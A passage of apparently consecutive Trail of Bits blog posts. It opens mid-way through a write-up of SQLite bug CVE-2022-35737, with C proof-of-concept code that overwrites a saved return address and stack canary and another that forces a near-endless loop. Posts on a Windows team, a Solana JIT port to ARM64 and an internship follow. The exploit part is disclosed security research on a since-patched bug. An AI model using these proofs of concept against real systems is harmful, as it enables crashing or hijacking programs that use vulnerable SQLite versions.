    We have been working on an Ubuntu 20.04 host and have a version of libsqlite.so version 3.31.1 installed from the APT package manager, so that is the version of the compiled binary that we examine in Binary Ninja:

    Binary Ninja disassembly of the compiled loop from source code lines 824 to 830, where the escarg input string is scanned for quote-characters. [1a] and [1b] indicate source line 825 escarg[i]; … i++. [2a] and [2b] indicate source line 828 escarg[i+1]; … i++.

    At instruction [1a], r10 contains the address of escarg, and rsi is used to index into the buffer to fetch a value from it, where the rsi register was set by sign-extending the 32-bit edx register in the instruction immediately before it. This corresponds to the escarg[i] expression on line 825 of the source code. With each loop iteration, edx is incremented at instruction [1b]. This means that the source code variable i is represented using signed 32-bit integer semantics, and so when i reaches the maximum 32-bit positive signed integer value (0x7fffffff), it will increment to 0x80000000 at [1b], which will be sign-extended into rsi as 0xffffffff80000000 and used to negatively index into escarg.

    However, instruction [2a] tells a different story. Here, r10 still contains the address of escarg, but rax+1 is used to index into the buffer, corresponding to the escarg[i+1] expression on line 828 of the source code, in the inner loop that scans for unicode characters. Instruction [2b] increments rax, but as a 64-bit value—and with no 32-bit sign-extension—before looping back to [2a]. Here, i is represented with unsigned 64-bit integer semantics, so that when i exceeds the maximum signed 32-bit integer value (0x7fffffff), its next memory access is to escarg+0x80000000. We have divergent representations of the same source variable, and two different values can be read from memory for the same value of the source variable i! This discovery prompted us to search for more instances of these “divergent representations,” and we describe this search in a forthcoming blog post.

    Okay, so can we use this compilation quirk to set the conditions for a more interesting exploit of CVE-2022-35737? Turns out, yes.

    Controlling the Saved Return Address

    Here’s a quick recap of the conditions that we are trying to set:

      
    case etSQLESCAPE:           /* %q: Escape ' characters */
    case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
    case etSQLESCAPE3: {        /* %w: Escape " characters */
      int i, j, k, n, isnull;
      int needQuote;
      char ch;
      char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
      char *escarg;
    
      if( bArgList ){
        escarg = getTextArg(pArgList);
      }else{
        escarg = va_arg(ap,char*);
      }
      isnull = escarg==0;
      if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
      /* For %q, %Q, and %w, the precision is the number of bytes (or
      ** characters if the ! flags is present) to use from the input.
      ** Because of the extra quoting characters inserted, the number
      ** of output characters may be larger than the precision.
      */
      k = precision;
      for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
        if( ch==q )  n++;
        if( flag_altform2 && (ch&0xc0)==0xc0 ){
          while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
        }
      }
      needQuote = !isnull && xtype==etSQLESCAPE2;
      n += i + 3;
      if( n>etBUFSIZE ){
        bufpt = zExtra = printfTempBuf(pAccum, n);
        if( bufpt==0 ) return;
      }else{
        bufpt = buf;
      }
      j = 0;
      if( needQuote ) bufpt[j++] = q;
      k = i;
      for(i=0; i<k; i++){
        bufpt[j++] = ch = escarg[i];
        if( ch==q ) bufpt[j++] = ch;
      }
      if( needQuote ) bufpt[j++] = q;
      bufpt[j] = 0;
      length = j;
      goto adjust_width_for_utf8;
    }
    

    Here is a screenshot to highlight what we want to concentrate on:

    We want the loop at [1] to terminate with values of i and n set so that the calculation at [2] overflows, resulting in a value of n that is negative or less than etBUFSIZE (70) and i set to a relatively small positive integer value that is greater than etBUFSIZE. This would allow the loop at [3] to write beyond the bounds of the stack-allocated bufpt, but without causing the program to crash immediately by writing beyond the stack memory region.

    Consider the string input that contains 0x7fffff00 single-quote (‘) characters, followed by a single 0xc0 byte (a unicode prefix) and then by enough 0x80 bytes to bring the total string length to 0x100000100 bytes (followed by a NULL byte). Let’s call this string string1, and think about what happens when this string is passed to sqlite3_snprintf:

    snprintf3_snprintf(len, buf, “‘%!q’”, string1) 

    (Notice that we’ve changed the format string to allow unicode characters by providing the ! character.)

    When the loop at [1] scans the first 0x7fffff00 bytes of string1, n and i both increment to 0x7fffff00. On the next loop iteration, the program reads the unicode character prefix from the input string and enters the inner loop, where i is represented with 64-bit unsigned semantics. The i variable increments to 0x100000100 before a NULL byte is encountered, causing the inner loop to terminate. At this point in program execution, n=0x7fffff00 and, when downcast to a 32-bit value, i=0x100. If the loop at [1] terminated at this point, the computation n+=i+3 would result in n=0x80000003, which is negative when treated as a signed value. Meanwhile, i is now a small positive integer but is greater than 70 (etBUFSIZE), which would result in a stack buffer overflow when 256 (0x100) bytes are read into a stack buffer of 70 bytes. This shows progress towards our goal: An extra couple of hundred bytes written to the stack are unlikely to reach the end of the stack memory region, but they are likely to reach interesting data saved on the stack, like saved return addresses and stack canaries. We can determine the exact position of this data on the stack by inspecting the target binary, and then adjust the input string size to control how much data is overwritten to the stack buffer.

    Unfortunately, this approach will not work as-is, because the loop at [1] does not terminate at the point described above. Because of the divergent representations of the i variable, escarg[i+1] at line 828 (inner loop) will represent i as 0x100000100 and read a NULL byte at the end of our large string, but escarg[i] at line 825 (outer loop) will represent i as 0x100 and instead read a single-quote character () from near the beginning of the input string. As a result, the loop exit condition is not met and the loop continues, with i=0x100 and n=0x7fffff00. Notably, by this point k has decremented 0x7fffff00 times. Because there is no NULL byte in the input string in the first 231 bytes, escarg[i] will never read a NULL byte at line 825, and we have to instead depend on k decrementing to 0 in order to exit the loop at [1]. We can accomplish this by allowing the outer loop to continue incrementing until k has decremented all the way to 0, but with specially calculated values for n and i.

    With this thought in mind, we can take the same approach described above, which is to increment n to a very large positive value by supplying single-quote characters in the input string, and to then set i to a small positive value by supplying unicode characters to increment i using 64-bit unsigned semantics. We calculate our values by accounting for the fact that the outer loop will increment 232 times because k needs to decrement from 0xffffffff to 0.

    Our proof of concept uses this insight to control the number of bytes that overflow the stack-allocated buffer and overwrite the saved return address and stack canary:

    #include <assert.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    // Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using
    // the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04.
    #define RETADDR_OFFSET  0
    #define CANARY_OFFSET   0x40
    #define BUF_OFFSET      0x88
    #define CANARY          0xbaadd00dbaadd00dull
    #define ROPGADGET       0xdeadbeefdeadbeefull
    #define NGADGETS        1
    
    struct payload {
        uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
        uint64_t canary;
        uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
        uint64_t ropchain[NGADGETS];
    }__attribute__((packed, aligned(1)));
    
    int main(int argc, char *argv[]) {
        char dst[256];
        struct payload p;
        memset(p.padding1, 'a', sizeof(p.padding1));
        p.canary = CANARY;
        memset(p.padding2, 'b', sizeof(p.padding2));
        p.ropchain[0] = ROPGADGET;
    
        size_t target_n = 0x80000000;
        assert(sizeof(p) + 3 <= target_n);
        size_t n = target_n - sizeof(p) - 3;
        size_t target_i = 0x100000000 + (sizeof(p) / 2);
    
        char *src = calloc(1, target_i);
          if (!src) { printf("bad allocation\n"); return -1; }
    
        size_t cur = 0;
        memcpy(src, &p, sizeof(p));
        cur += sizeof(p);
        memset(src+cur, '\'', n/2);
        cur += n/2;
        assert(cur < 0x7ffffffeul);
        memset(src+cur, 'c', 0x7ffffffeul-cur);
        cur += 0x7ffffffeul-cur;
        src[cur] = '\xc0';
        cur++;
        memset(src+cur, '\x80', target_i - cur);
        cur = target_i;
        src[cur-1] = '\0';
    
        sqlite3_snprintf((int) 256, dst, "'%!q'", src);
        free(src);
        return 0;
    }
    

    This proof of concept causes the program to crash, but with a SIGABRT rather than a SIGSEGV. This implies that a stack canary was overwritten and that the vulnerable function tried to return. This is in contrast to the earlier crashing proof of concept that crashed before reaching the function return.

    To confirm that we have successfully controlled the saved return address and stack canary, we can use GDB to view the stack frame before the vulnerable function returns:

    Executing the proof of concept in a debugger shows that the saved return address is set to 0xdeadbeefdeadbeef.

    Note that in a non-contrived scenario, a real stack canary will contain a NULL byte, which would defeat the proof of concept above because the NULL byte will cause the string-scanning loop to terminate before the entire payload is copied over the return address. Clever exploitation techniques or specific format string conditions may allow an attacker to bypass this, but our intention is to show that the saved return address can be overwritten.

    Looping (Nearly) Forever

    We took our exploitation one step further and developed a proof of concept that uses the divergent representations of the i variable to cause loop [1] to iterate nearly infinitely by incrementing i 264 times, which effectively takes forever. This is achieved by causing the inner loop to increment i 232 times on every iteration of loop [1], which will also increment 232 times. The interesting part of this proof of concept is that it doesn’t actually reach the vulnerable integer overflow computation on line 832, but uses only the undefined behavior that results from allowing string inputs larger than what can be represented with 32-bit integers. All that is required is to fill a buffer of 0x100000000 bytes with unicode prefix characters (a single byte of 0xc0 followed by bytes of 0x80), and the loop at [1] will never terminate:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    #include <unistd.h>
    
    int main(int argc, char *argv[]) {
        size_t src_buf_size = 0x100000001;
    
        char *src = calloc(1, src_buf_size);
          if (!src) {
            printf("bad allocation\n");
            return -1;
        }
        src[0] = '\xc0';
        memset(src+1, '\x80',  0xffffffff);
    
        char dst[256];
        sqlite3_snprintf(256, dst, "'%!q'", src);
        free(src);
        return 0;
    }
    

    We showed that CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also showed that if the format string additionally allows for unicode characters by providing the ! character, then it is possible to overwrite the saved return address and to cause the program to loop (nearly) infinitely.

    But, SQLite is well-tested, right?

    SQLite is extensively tested with 100% branch test coverage. We discovered this vulnerability despite the tests, which raises the question: how did the tests miss it?

    SQLite maintains an internal memory limit of 1GB, so the vulnerability is not reachable in the SQLite program. The problem is “defined away” by the notion that SQLite does not support big strings necessary to trigger this vulnerability.

    However, the C APIs provided by SQLite do not enforce that their inputs adhere to the memory limit, and applications are able to call the vulnerable functions directly. The notion that large strings are unsupported by SQLite is not communicated with the API, so application developers cannot know how to enforce input size limits on these functions. When this code was first written, most processors had 32-bit registers and 4GB of addressable memory, so allocating 1GB strings as input was impractical. Now that 64-bit processors are quite common, allocating such large strings is feasible and the vulnerable conditions are reachable.

    Unfortunately, this vulnerability is an example of one where extensive branch test coverage does not help, because no new code paths are introduced. 100% branch coverage says that every line of code has been executed, but not how many times. This vulnerability is the result of invalid data that causes code to execute billions of times more than it should.

    The thoroughness of SQLite’s tests is remarkable — the discovery of this vulnerability should not be taken as a knock on the robustness of the tests. In fact, we wish more projects put as much emphasis on testing as SQLite does. Nonetheless, this bug is evidence that even the best-tested software can have exploitable bugs.

    Conclusion

    Not every system or application that uses the SQLite printf functions is vulnerable. For those that are, CVE-2022-35737 is a critical vulnerability that can allow attackers to crash or control programs. The bug has been particularly interesting to analyze, for a few reasons. For one, the inputs required to reach the bug condition are very large, which makes it difficult for traditional fuzzers to reach, and so techniques like static and manual analysis were required to find it. For another, it’s a bug that may not have seemed like an error at the time that it was written (dating back to 2000 in the SQLite source code) when systems were primarily 32-bit architectures. And—most interestingly to us at Trail of Bits—its exploitation was made easier by the discovered “divergent representations” of the same source variable, which we explore further in a separate blog post.

    I’d like to thank my mentor, Peter Goodman, for his expert guidance throughout my summer internship with Trail of Bits. I’d also like to thank Nick Selby for his help in navigating the responsible disclosure process, and all members of the Trail of Bits team who assisted in advising and writing this blog post.

    Coordinated disclosure

    July 14, 2022: Reported vulnerability to the Computer Emergency Response Team (CERT) Coordination Center.
    July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers.
    July 18, 2022: SQLite maintainers confirmed the vulnerability and fixed it in source code.
    July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with fix.

    We would like to thank the teams at SQLite and CERT/CC for working swiftly with us to address these issues.

    We do Windows now

    At Trail of Bits, we pride ourselves on building tools that everyone can use to help improve the security ecosystem. Given how ingrained Microsoft is with a large portion of our work — binary analysis, cryptography, cloud security — our teams’ research and development has resulted in numerous tool releases for the public to incorporate into their own security strategies.

    To build upon these efforts, we now have established a dedicated team filled with some of the world’s foremost Windows security experts that will incubate new research projects and execute engineering initiatives focused on the security of one of the world’s most prevalent operating systems.

    The team will leverage the company’s existing relationships in both the public and private sector to work on various Microsoft technologies and initiatives. As Trail of Bits has helped secure some of the world’s most targeted organizations and devices, this team will bring high-end security research together with a real-world attacker mentality to discover, analyze, and solve security issues in one of the world’s most popular operating systems.

    The team in composed of the following members:

    • Aaron LeMasters, a principal security engineer, is a technologist and researcher with over 16 years of experience in malware analysis, reverse engineering, Windows internals and kernel driver development. In addition to several issued and provisional patents, he has numerous publications on various research topics and has spoken at renowned conferences such as Blackhat USA, No Such Con, SyScan and Brucon.
    • Yarden Shafir, a senior security researcher, is a world-renowned expert on Windows internals and security tools. She teaches security courses on advanced Windows topics with Winsider Seminars and Solutions. Previously she worked at CrowdStrike and SentinelOne, researching and developing EDR features. Outside of her primary work duties, she has spoken extensively on various topics, such as CET internals, kernel exploitation techniques, extension host hooking and kernel exploit mitigations.
    • Adam Meily, a senior security research engineer, previously architected an agentless proactive malware hunting and incident response framework that scaled to over 500,000 systems across a wide variety of Windows versions, configurations, and architectures. He has also built hardened Windows-based memory forensic and analysis tools to securely run critical processes on contested systems and identify advanced attacks, indicators of compromise, and deviations from baseline configurations.

    The team will focus on the security boundaries of three logical architectural layers: operating systems, virtualization, and hardware and architecture support. Initial research will cover hardware and firmware microarchitectures to the operating system and related system libraries, with plans to expand to other software ecosystems in the future. The work will result in outputs similar to other projects conducted by Trail of Bits: client assessment reports, conference presentations, blog posts and other publications, and open-source tools posted on GitHub.

    The new effort will build upon years of Windows-related work Trail of Bits has conducted, such as a project with Facebook that resulted in the first Windows platform support for the osquery open-source endpoint agent. An extremely popular operating system analysis tool, osquery allows security teams to build customized queries needed to track security-related data.

    Other Windows-based security projects include a tool to verify Authenticode signatures on Windows executables, a Rust-based sandbox for Windows Defender, and training code that allows researchers to study bugs and prevent them from turning into exploits.

    Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects. You can keep up with our latest news and announcements on Twitter (@trailofbits) and explore our public repositories on GitHub.

    Porting the Solana eBPF JIT compiler to ARM64

    By Andrew Haberlandt 

    During my summer internship at Trail of Bits, I worked on the fork of the RBPF JIT compiler that is used to execute Solana smart contracts. The RBPF JIT compiler plays a critical role on the Solana blockchain, as it facilitates the execution of contracts on validator nodes by default.

    Before my work on this project, RBPF supported JIT mode only on x86 hosts. An increasing number of developers are using ARM64 machines, but are unable to run their test in JIT mode. My primary goal was to add support in RBPF for the ARM64 architecture, mainly by updating the register map, calling convention, and all of the subroutines and instruction translations to emit ARM64 instructions. I also aimed to implement support for Windows in the RBPF x86 JIT compiler.

    The work is live and can be found in two pull requests on Solana’s GitHub page. However, a caveat: it is currently behind a feature-gate ('jit-aarch64-not-safe-for-production') and is not ready for production until it has received a thorough peer review.

    Background

    Smart contracts that run on the Solana blockchain are compiled from Rust (or C, if you like bugs) to eBPF, an extended version of the Berkeley Packet Filter. The eBPF virtual machine’s architecture is fairly simple, with a minimal set of 32- and 64-bit integer operations (including multiplication and division) and memory and control flow instructions. BPF programs have their own address space, which in RBPF consists of code, stack, heap, and input data sections located at fixed addresses.

    The version of BPF supported by RBPF was designed to work with programs compiled using the LLVM BPF back end. The official Linux documentation for eBPF shows that there are a few differences between RBPF and eBPF—most notably, RBPF has to support an indirect call (callx) instruction.

    Furthermore, RBPF’s “verifier” is much simpler than that of eBPF. In the Linux kernel, the eBPF verifier validates certain safety properties of BPF programs before JITing and executing them. In RBPF, Solana programs pass through a much simpler verifier before being JITed. The verifier checks for instructions that try to divide by a constant zero, jump to a clearly invalid address, or read or write to an invalid register, among other errors. Notably, the RBPF verifier does not perform any CFG analysis or attempt to track the range of values held by each register. The full list of errors that the RBPF verifier checks for can be found here.

    RBPF internals

    The source code to binary translation stages

    RBPF verifies then translates an entire program, instruction by instruction, into the target architecture before finally calling into the emitted code. This involves an eBPF instruction decoder and a partial instruction encoder for the target architecture (before the summer of 2022, only x86 was supported). RBPF also provides an interpreter capable of executing eBPF Solana programs, but the JITed translations are the default for performance reasons.

    Memory and address translation

    BPF programs are executed in their own memory space, and there is a mapping between this address space and the host address space. Memory regions are set up (using mmap and mprotect) for each program that is to be executed; the BPF code, stack, heap, and input data have their own regions, located at fixed addresses in BPF address space. The locations of these mappings in the host address space are not fixed.

    The memory layout of the vm environment

    To handle eBPF load and store instructions, the address must first be translated into the host address space. RBPF includes a translate_memory_address assembly routine, which is responsible for looking up the region that contains the address being accessed and for translating the BPF address into a host address. This translation logic is invoked every time a BPF load or store instruction is executed, as shown in the example instruction translations later in this post.

    Register allocation

    BPF has 11 registers (10 general purpose registers and the frame pointer), each of which maps to a distinct register in the host architecture. On x86_64, which has 16 registers, four of the remaining registers are used for specific purposes (RSP cannot be repurposed, since the original host call stack will be maintained), described below:

    // Special registers:
    //     ARGUMENT_REGISTERS[0]  RDI  BPF program counter limit (used by instruction meter)
    // CALLER_SAVED_REGISTERS[8]  R11  Scratch register
    // CALLER_SAVED_REGISTERS[7]  R10  Constant pointer to JitProgramArgument (also scratch register for exception handling)
    // CALLEE_SAVED_REGISTERS[0]  RBP  Constant pointer to initial RSP - 8
    
    

    Source: Line 224 of jit.rs in solana-labs

    Instruction translation

    Translating instructions in RBPF is a fairly straightforward process:

    • Registers in the eBPF virtual machine are mapped to a unique register in the host architecture.
    • Each opcode is translated to one or more instructions in the host architecture (via this large match statement).

    Two example translations are displayed below:

    Example instruction translations

    RBPF includes subroutines that are emitted once to handle shared logic (such as address translation, which is performed by translating the load instruction above). Sometimes these subroutines include calls back into Rust code to handle more complicated operations (e.g., tracing, “syscalls”) or to update certain externally visible states (e.g., the instruction meter). There is also a prologue (e.g., to set up the stack, handle exceptions, etc.) and an epilogue (e.g., to handle cases in which the execution reaches the last instruction in the program and does not exit, which is normally done by calling an exit function).

    The memory layout of the JIT code region

    Control flow

    Every BPF instruction is a valid target address for a jump or call. eBPF instructions are 8 bytes, with one exception: load double word (LDDW), which is 16 bytes. This means that, with this one exception, every 8-byte boundary in the BPF code address space is a valid jump target.

    Relative jumps can always be resolved before runtime; they can either be resolved at translation-time (for backward jumps) or be ‘fixed up’ after all instructions have been emitted (for forward jumps). Indirect calls, however, must be resolved at runtime. Therefore, RBPF keeps a mapping from the instruction index to the host address so that the location of the already-translated target instruction can be looked up when an indirect call occurs.

    The instruction meter

    Solana programs are designed to run with a specific ‘compute budget’, which is essentially the number of eBPF instructions that can be executed before the program exits. In order to enforce this limit (on potentially non-terminating programs), the JIT compiler emits additional logic to track the number of instructions that have been executed. The instruction meter is best described in this comment, but it can be summarized as follows:

    • The source of each branch is instrumented to account for the instructions that were executed in the linear sequence since the last update and to record the branch target (the beginning of the next linear sequence of instructions to execute).
    • If a conditional branch is not actually taken, the updates to the instruction meter are undone.
    • Additional instruction meter checks are inserted at certain thresholds in long linear sequences of instructions.

    The instruction meter has been the source of multiple bugs in the past (e.g., check out pull request 203 and pull request 263).

    Calls and “syscalls”

    For regular eBPF calls within the same program, RBPF keeps a separate stack from the host (currently using fixed-size stack frames), tracks the current call depth, and exits with an error if the call depth exceeds its budget. Solana programs in particular also need to invoke other contracts and interact with certain blockchain states. RBPF has a mechanism called “syscalls” by which eBPF programs can make calls into Solana-specific helper functions implemented in Rust.

    Exceptions

    The JIT compiler may exit early if it encounters a number of unrecoverable runtime conditions (such as division by zero or invalid memory access). Since the verifier does not attempt to track register content, most exceptions are caught at runtime rather than at verification time. Exception handlers are designed to record the current exception information into an EbpfError enum and then proceed to the exit the subroutine (which returns back into Rust code).

    Security mitigations

    RBPF contains a few features that fall under the category of “machine code diversification” and serve to somewhat harden the JIT compiler against exploitation. Two of the features (introduced last year) are constant sanitization and instruction address randomization.

    Constant sanitization changes how immediates are loaded into registers in the emitted code. Rather than emitting a typical x86 MOVABS instruction, which would contain the unmodified bytes of the immediate, the immediate is instead offset by a randomly generated key. At runtime, this key is fetched from memory in a subsequent instruction and added so that the destination register contains the originally desired immediate.

    Instruction address randomization adds no-op instructions at random locations throughout the emitted code. Both of these mitigations are intended to make code-reuse attacks more difficult.

    Porting RBPF to ARM64

    Calling convention and register allocation

    The JIT compiler needs to be able to call into Rust code, which will follow the host’s calling convention. Luckily, most platforms follow the ARM software standard for the calling convention. Both Apple and Microsoft publish their own ABI documentation, but they mostly follow the standard ARM64 documentation. I tested my implementation on M1 running macOS and on an emulated ARM64 virtual machine through QEMU.

    Note that ARM64’s additional registers mean that even after mapping each eBPF register to a host register, there is a substantial number of extra unused host registers. I used some of these extra registers to hold additional “scratch” values during the translation of more complex instructions. Additional scratch values are often helpful since only load and store instructions can access memory in ARM64, which often results in longer translations with more temporary values.

    Instruction-by-instruction translation

    I wrote translations to ARM64 for each of the eBPF instructions, modeled closely after their x86 translations. The following is an example of the existing x86 and the new translated ARM64 code for two variants of the eBPF ADD instruction.

    The existing x86 code

    The translated ARM64 code

    Note that ARM64’s fixed instruction size of 4 bytes means that you can’t encode every 32-bit immediate in a single instruction, and ARM64 ALU instructions can encode only a very limited range of immediate values. So some simple eBPF instructions require multiple ARM64 instructions (e.g., emit_load_immediate64 may emit more than one instruction to move the immediate into the scratch register), even if they require only a single x86 instruction.

    Some surprises

    The ARM64 ABI has a required stack alignment of 16-bytes at the time of any SP-relative access; this alignment is supposed to be enforced by hardware. QEMU does not enforce this alignment by default, but the Apple M1 does.

    The subroutines (which are responsible for exception handling, address translation, resolving indirect calls, etc.) each have slightly different conventions for their inputs and outputs, and these conventions are not well documented. Rewriting these subroutines correctly in ARM64 was, by far, the most time-consuming part of this process. I did eventually document many of my assumptions about these subroutines. These subroutines are also responsible for some quite complex logic, including address translation and instruction meter accounting.

    When I published the ARM64 port, I made sure it was behind a feature-gate, jit-aarch64-not-safe-for-production. This is an intern project aimed to allow developers to use the JIT compiler, and it is not ready for production until it has received a thorough peer review.

    My ARM64 port of RBPF is currently available through the Trail of Bits fork or this pull request.

    Winapi

    The Windows virtual memory APIs use VirtualAlloc and VirtualProtect in lieu of mmap and mprotect. For our purposes, these are nearly drop-in replacements—I just had to pick the permission and allocation options that correspond most closely to those used in mmap and mprotect.

    Calling convention

    The Windows x64 calling convention designates different registers as caller and callee-save; it also has an additional “shadow space” requirement in which callers are responsible for leaving 32 bytes of space on the stack before the call (after any stack-resident arguments have been pushed).

    As with ARM64, Windows support is behind a feature flag, jit-windows-not-safe-for-production.

    A small, unexploitable bug

    My ARM64 port of RBPF did uncover a small, unexploitable uninitialized memory bug that was present even in the existing x86 JIT compiler. VTCAKAVSMoACE pointed out some warnings when running my ARM64 branch under the LLVM memory sanitizer (MSAN). I investigated these warnings and found the culprit to be this function:

    fn emit_set_exception_kind<E: UserDefinedError>(jit: &mut JitCompiler, err: EbpfError<E>) {
        let err = Result::<u64, EbpfError<E>>::Err(err);
        let err_kind = unsafe { *(&err as *const _ as *const u64).offset(1) };
        ...
        emit_ins(jit, X86Instruction::store_immediate(OperandSize::S64, R10, X86IndirectAccess::Offset(8), err_kind as i64));
    }

    This function takes an EbpfError value as the second argument, moves it into a Result, and then uses unsafe code to grab bytes 8 through 16 out of the Result. These bytes correspond to the integer discriminant that determines which variant (error type) the EbpfError is. No guarantees are made by the Rust compiler about the size or layout of enums, unless you add a repr attribute to the enum (like #[repr(u64)]).

    The Rust compiler had decided that the EbpfError enum discriminant would be only a u8, so the enum that is passed to emit_set_exception_kind actually had 7 bytes of uninitialized stack memory that was being written into the JIT code region. Uninitialized (potentially attacker-controlled) bytes that are written into an executable region is not a bug on its own, but they partially defeat the purpose of the code-reuse mitigations discussed above.

    I opened a pull request that adds #[repr(u64)]. Since the JIT compiler makes an additional assumption about enum layouts (i.e., for Result in the Rust standard library), I also added tests that should detect whether the compiler ever changes the location or size of the enum discriminant on certain types.

    Conclusion

    Given how important the RBPF JIT compiler is to the Solana blockchain, we felt that it was important for the widest range of developers to use it on whatever machine they are using for development. Now, it’s possible for developers using either M1 and Windows machines to also use the JIT compiler during testing. While the work still needs a peer review, it can be found in two pull requests on GitHub. Feel free to try it out!

    Thanks to Anders Helsing for the fantastic guidance as I explored the internals of RBPF, and learned the finer points of both the ARM64 and Windows x64 ABI.

    This work shows how Trail of Bits is rooted in solving Solana’s security challenges, building upon the deep Solana expertise we’ve used to build tools we have already released to the public. Not only do we aim to make Solana as secure as possible, we want to make the tools engineers use with Solana equally as secure. Our ultimate goal with these efforts is to raise the security level for all of the Solana projects that will be built in the future.

    Working on blockchains as a Trail of Bits intern

    By Vara Prasad Bandaru

    Earlier this year, I successfully completed my internship at Trail of Bits and secured a full-time position as a Blockchain Security Analyst.

    This post is not intended to be a technical description of the work I did during my internship. Rather, it is intended to describe my general experience as a Trail of Bits intern. I hope that reading about my experience will motivate others to apply for future internships at Trail of Bits.

    First, I will introduce myself and give some background on my technical expertise. Then, I will explain the application and interview processes and describe some of the work I did during my time as an intern (spoiler alert: I worked on Tealer, a static analyzer for Algorand smart contracts!). Finally, I’ll provide a list of takeaways that I would have wanted to know when I applied and a few things I liked about interning at Trail of Bits.

    Who am I?

    I’m in my final year of my bachelor’s program in computer science at RGUKT Nuzvid, a tier 3 college in India. Before my internship at Trail of Bits in the winter of 2021, I didn’t have much industry experience other than completing one computer science project (Monkey Interpreter, a Python rewrite of a Golang implementation) and competing in capture-the-flag (CTF) competitions. I began competing in CTFs near the end of the first year of my bachelor’s program (and still do on the weekends) under the username S3v3ru5.

    I mainly concentrated on cryptography-related challenges, my strongest category, when I first started competing in CTFs. But around August of 2021, I began participating in blockchain-related challenges to gain experience in this technology that everyone is talking about. I was able to complete an easy Solana blockchain challenge in the ALLES CTF and all of the Ethereum blockchain challenges in the Ethernaut CTF, a web3/Solidity-based war game. I began this work only about a month and a half before I applied for my internship at Trail of Bits. As you can see, I didn’t have much blockchain experience beforehand.

    It was through my work on these CTFs that I became familiar with Trail of Bits. I would always see Trail of Bits in the sponsors section of the CTFs I competed in, and I still remember solving a challenge presented by Trail of Bits in one of the CSAW finals. I always referred to (and still do) the Trail of Bits CTF guide and blog posts, especially “ECDSA: Handle with Care.”

    Applying for the internship

    As I was approaching the end of 2021, I started looking into cybersecurity internships, mainly those related to cryptography (my strong suit) and blockchain (my most recent area of interest). There were very few internships that both related to my interests and would accept a bachelor’s student who had no prior experience other than competing in CTFs and who hadn’t completed many projects. But I did remember that Trail of Bits is a top cybersecurity research and consulting firm that values CTFs, emphasizes self-learning, and gives people chances.

    I decided to look into Trail of Bits’s open roles and discovered the winternship program. These interns work on a Trail of Bits project, or even on their own security-related projects, under the guidance of a mentor. The internship is paid and takes place over the winter break to give students and new security engineers real industry experience and an opportunity to write a publication for their resumes. An internship at Trail of Bits could even lead to an offer for a full-time role.

    I wasn’t working on any projects at the time I applied for the internship, so I decided to apply for a few of the available Trail of Bits projects that seemed interesting to me. First, I applied to two projects that would allow me to gain more experience with blockchain technology: Manticore, a symbolic execution tool developed by Trail of Bits for analyzing Ethereum smart contracts and Linux ELF binaries, and a project researching the Solana blockchain. Both Ethereum and Solana are blockchains I’m technically familiar with, so I thought those projects would be a good fit. However, I later decided to apply to work on Tealer, a static analyzer for code written in Teal, an assembly-like language used in the Algorand blockchain. Even though I didn’t have experience with static analysis or the Algorand blockchain, Tealer was both a relatively small and new project: I knew that I could easily read through the source code to get my feet wet and that my work on this project could form the basis for future work. Finally, the application procedure was the same for all three projects, so I thought, “why not?”

    I was invited to an initial 30-minute phone screen to discuss both Manticore and Tealer. It was my first interview, so I was a little nervous, but the Trail of Bits engineer I interviewed with, Felipe Manzano (who later became one of my mentors), made the experience enjoyable and stress-free. It felt more like a casual conversation with a friend about the work and my experience and interests. After that, we had another five-minute call to discuss the internship start date, the place of work, and other onboarding information. I received the offer letter later that day: I was selected to work on Tealer, the project I was hesitant to apply for.

    I was surprised by this interview process. It was entirely different from many of my friends’ experiences interviewing with other companies. My interview was easy and better than most in every way for an internship role.

    Preparing for the internship

    As I prepared for my first internship, I realized that I was not familiar with many of the tools and concepts that I would be working with. For example, I hadn’t worked with the Algorand blockchain or static analysis tools, and I wasn’t very experienced in Git or GitHub. I was worried that I was going to fail in my internship if I didn’t put in the effort to learn these tools and concepts before my internship started.

    My internship was supposed to start on December 13, 2021, so I started my preparation on the first day of December. I read through various resources to learn about static analysis, the Algorand blockchain, Git, and GitHub during the first 10 days of December. I was able to see the results of my preparation when I found issues in Tealer’s parsing of Teal code compared to the developer docs, even before the start of my internship!

    During the internship

    Because of the level of preparation I did before my start date, I was able to start my work on Tealer on my first day. During my internship, I accomplished the following:

    I really liked working on Tealer, and my internship overall was an excellent experience. All my work was open for review and merged after approval. I received very good feedback and help whenever I was stuck. I was able to be involved in active discussions about the tool. And receiving an offer for a full-time position because of my performance in the internship made my experience even better.

    Tips and takeaways

    I’d like to offer some tips to prospective interns that I wish I had heard before my internship. Now that I have first-hand experience with a Trail of Bits internship, I can speak to how true these tips really are.

    • It’s OK if you don’t meet all the requirements of an internship that you’re applying for. There’s nothing wrong with applying. I was hesitant to apply to work on Tealer, but in the end, it worked out very well for me.
    • You don’t have to know everything you need to know for the internship you’re applying for. The point of an internship is to gain experience and to learn new things. Also, employers don’t look for people who already know everything (no one does) but for people who can learn and gain the required knowledge if given enough time.
    • Always ask for and take suggestions when in doubt.
    • Always seek help from your mentors. You don’t have to figure out everything by yourself, and nobody expects you to. Mentors are more experienced, have more knowledge, and are there to help their interns.
    • For those who are non-native English speakers, as I am, don’t stress if you are not fluent in English. As long as your coworkers can understand what you’re trying to communicate, it’s OK if you’re not very fluent or make mistakes. Of course, it’s a great idea to improve your communication skills in the long term, but never let your current level in English stop you from applying to internships.

    Why apply for the Trail of Bits internship?

